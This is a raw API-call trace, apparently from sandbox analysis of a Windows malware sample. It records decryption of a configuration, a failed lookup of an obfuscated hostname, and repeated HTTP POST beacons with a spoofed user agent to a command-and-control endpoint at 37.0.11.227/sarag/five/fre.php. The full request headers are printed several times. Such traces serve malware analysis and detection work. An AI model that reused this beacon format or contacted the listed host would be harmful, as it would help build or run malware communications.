177 [0312.174] GetProcessHeap () returned 0x690000 [0312.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0312.174] GetProcessHeap () returned 0x690000 [0312.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0312.175] GetProcessHeap () returned 0x690000 [0312.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0312.175] GetProcessHeap () returned 0x690000 [0312.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0312.176] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0312.176] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0312.177] GetProcessHeap () returned 0x690000 [0312.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0312.177] GetProcessHeap () returned 0x690000 [0312.178] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0312.178] send (s=0xa8c, buf=0x6ad508*, len=242, flags=0) returned 242 [0312.178] send (s=0xa8c, buf=0x6aba40*, len=159, flags=0) returned 159 [0312.178] GetProcessHeap () returned 0x690000 [0312.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0312.178] recv (in: s=0xa8c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0312.253] GetProcessHeap () returned 0x690000 [0312.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0312.254] GetProcessHeap () returned 0x690000 [0312.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0312.254] GetProcessHeap () returned 0x690000 [0312.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0312.255] GetProcessHeap () returned 0x690000 [0312.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0312.255] closesocket (s=0xa8c) returned 0 [0312.255] GetProcessHeap () returned 0x690000 [0312.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0312.255] GetProcessHeap () returned 0x690000 [0312.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0312.257] GetProcessHeap () returned 0x690000 [0312.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0312.257] GetProcessHeap () returned 0x690000 [0312.258] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0312.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1714) returned 0xa8c [0312.259] Sleep (dwMilliseconds=0xea60) [0312.260] GetProcessHeap () returned 0x690000 [0312.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0312.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.261] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.266] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0312.277] GetProcessHeap () returned 0x690000 [0312.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0312.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.277] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0312.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.280] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.281] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.281] GetProcessHeap () returned 0x690000 [0312.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0312.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.283] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0312.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.284] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0312.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.285] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0312.285] GetProcessHeap () returned 0x690000 [0312.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0312.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.285] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.286] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.288] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.289] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.289] GetProcessHeap () returned 0x690000 [0312.289] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0312.289] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.289] GetProcessHeap () returned 0x690000 [0312.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0312.292] GetProcessHeap () returned 0x690000 [0312.292] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0312.292] GetProcessHeap () returned 0x690000 [0312.292] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0312.293] GetProcessHeap () returned 0x690000 [0312.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0312.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.293] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.300] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0312.304] GetProcessHeap () returned 0x690000 [0312.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0312.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.305] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0312.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.306] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.307] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.307] GetProcessHeap () returned 0x690000 [0312.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0312.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.308] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0312.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.309] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0312.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.310] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0312.310] GetProcessHeap () returned 0x690000 [0312.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0312.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.311] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0312.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.314] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0312.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.315] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0312.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.315] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0312.315] GetProcessHeap () returned 0x690000 [0312.315] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0312.316] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0312.316] GetProcessHeap () returned 0x690000 [0312.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0312.316] socket (af=2, type=1, protocol=6) returned 0xa90 [0312.316] connect (s=0xa90, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0312.340] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0312.340] GetProcessHeap () returned 0x690000 [0312.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0312.340] GetProcessHeap () returned 0x690000 [0312.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0312.341] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0312.342] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0312.342] GetProcessHeap () returned 0x690000 [0312.342] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0312.342] GetProcessHeap () returned 0x690000 [0312.342] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0312.342] GetProcessHeap () returned 0x690000 [0312.342] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0312.342] GetProcessHeap () returned 0x690000 [0312.342] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0312.343] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0312.344] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0312.344] GetProcessHeap () returned 0x690000 [0312.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0312.344] GetProcessHeap () returned 0x690000 [0312.344] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0312.346] send (s=0xa90, buf=0x6ad508*, len=242, flags=0) returned 242 [0312.347] send (s=0xa90, buf=0x6aba40*, len=159, flags=0) returned 159 [0312.347] GetProcessHeap () returned 0x690000 [0312.347] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0312.347] recv (in: s=0xa90, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0312.450] GetProcessHeap () returned 0x690000 [0312.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0312.450] GetProcessHeap () returned 0x690000 [0312.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0312.451] GetProcessHeap () returned 0x690000 [0312.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0312.452] GetProcessHeap () returned 0x690000 [0312.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0312.452] closesocket (s=0xa90) returned 0 [0312.452] GetProcessHeap () returned 0x690000 [0312.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0312.453] GetProcessHeap () returned 0x690000 [0312.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0312.453] GetProcessHeap () returned 0x690000 [0312.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0312.453] GetProcessHeap () returned 0x690000 [0312.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0312.642] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16b4) returned 0xa90 [0312.644] Sleep (dwMilliseconds=0xea60) [0312.645] GetProcessHeap () returned 0x690000 [0312.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0312.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.646] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.651] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0312.658] GetProcessHeap () returned 0x690000 [0312.658] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0312.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.658] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0312.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.660] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.660] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.660] GetProcessHeap () returned 0x690000 [0312.661] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0312.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.672] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0312.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.674] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0312.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.675] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0312.675] GetProcessHeap () returned 0x690000 [0312.675] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0312.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.676] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.677] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.677] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.678] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.678] GetProcessHeap () returned 0x690000 [0312.678] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0312.678] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.678] GetProcessHeap () returned 0x690000 [0312.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0312.679] GetProcessHeap () returned 0x690000 [0312.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0312.679] GetProcessHeap () returned 0x690000 [0312.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0312.680] GetProcessHeap () returned 0x690000 [0312.680] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0312.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.681] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.687] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0312.691] GetProcessHeap () returned 0x690000 [0312.691] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0312.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.692] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0312.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.693] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.694] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.694] GetProcessHeap () returned 0x690000 [0312.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0312.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.697] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0312.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.698] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0312.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.698] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0312.698] GetProcessHeap () returned 0x690000 [0312.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0312.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.699] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0312.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.700] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0312.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.702] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0312.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.703] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0312.703] GetProcessHeap () returned 0x690000 [0312.703] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0312.703] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0312.703] GetProcessHeap () returned 0x690000 [0312.703] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0312.703] socket (af=2, type=1, protocol=6) returned 0xa94 [0312.703] connect (s=0xa94, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0312.727] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0312.727] GetProcessHeap () returned 0x690000 [0312.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0312.727] GetProcessHeap () returned 0x690000 [0312.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0312.730] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0312.730] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0312.731] GetProcessHeap () returned 0x690000 [0312.731] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0312.731] GetProcessHeap () returned 0x690000 [0312.731] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0312.731] GetProcessHeap () returned 0x690000 [0312.731] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0312.731] GetProcessHeap () returned 0x690000 [0312.731] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0312.732] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0312.733] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0312.733] GetProcessHeap () returned 0x690000 [0312.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0312.733] GetProcessHeap () returned 